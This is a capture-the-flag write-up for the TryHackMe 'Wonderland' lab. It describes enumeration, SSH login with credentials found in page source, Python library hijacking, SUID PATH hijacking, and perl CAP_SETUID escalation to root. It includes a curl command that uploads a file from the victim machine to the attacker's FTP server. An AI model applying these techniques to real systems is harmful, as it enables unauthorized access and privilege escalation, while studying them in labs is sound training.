Wonderland CTF from TryHackMe!

This CTF worth a write up as it was a bit of a challenge for me.

1. So as always I start off by scanning the target machine via Nmap.

2. Enumeration. I like to run dirb and dirbuster for enumerating an available directory.

• from the results of enumeration, it’s showing some directories for both dirb and dirbuster such as /img, r/, r/a
• /img directory:

• checking all the directory /r, /a which tell us to keep going which made you think which way to go. Analyzing all the available images and directories content this one stands out:

• following the r/a/b/b/i/t directories

• and by examining the Page Source, it revealed which seems to be a user’s credential.

• this credential can be used logging into ssh. SSH was open during our nmap scanning earlier.

3. Gaining Access. Now that we have a user credential we can use it gaining access to the target system.

• and SWEET! Now we have gained access to the target machine.
• now we look around to find interesting file that leads us to get the flag.

• we saw root.txt but its own by root and belongs to group root and obviously, we don’t have any permission.
• now we run the command sudo -l to show the allowed command for the user Alice.

• the result tells us that the “User alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py — → which means we can run this python command with user rabbit
• so lets execute it, sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
• whenever running the command with sudo rabbit user it throws up some random poem.

• it looks like the python script is throwing it randomly ( with random module imported in python) as shown by cat’ng the walrus_and_the_carpenter.py script:

• at this stage we can create a script instead of the script — walrus_and_the_carpenter.py calling the real random module, we created a malicious random.py that would execute /bin/bash and give us rabbit user shell.

• SWEET! now we have escalated to rabbit user.
• navigating to /home/rabbit directory revealed a SUID file or searching the whole directory find / -perm -u=s -type f 2>/dev/null. One stand out is the teaParty:

• this is how the script looks like when executed

• we may need to check the actual code with strings command (or alike), however it looks like a binary file:

• from my host machine I was running an FTP server (VSFTP)
• then from the victim machine. I then uploaded the file teaParty file to my host machine to examine its content using the strings command.

rabbit@wonderland:/home/rabbit$ curl -T ./teaParty ftp://10.x.x.x — user user:secret

% Total % Received % Xferd Average Speed Time Time Time Current

Dload Upload Total Spent Left Speed

100 16816 0 0 100 16816 0 3191 0:00:05 0:00:05 — : — : — 3793

• we see from the file that the “date” (os command) is executed without absolute path. This can be abused by exporting our own created $PATH. Writing a small script called date.

• real date path is /bin/date, would then create a new PATH in /tmp
• now the shell will look into /tmp folder first running the command without an absolute PATH such as the one we created — date (below). /tmp directory is a good candidate as it’s a directory usually open permission to all u+g+o.

• now we have escalated to hatter user. Gotta look around for interesting files, just like in /home/hatter directory

• with the password revealed we can ssh using the user name hatter:

• next thing I needed was to escalate my privilege. This time I used the linpeas.sh (Linux Privilege Escalation Awesome Script) for enumeration of possible exploit.
• to download the script from my attacker machine to the target machine. I ran a simple python HTTP Server from the target machine and downloaded the file from the target machine.

• one of the interesting result was below. If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID. Click here for reference.

• then executing the one-liner command for perl to gain root access.

• CTF SOLVED!!!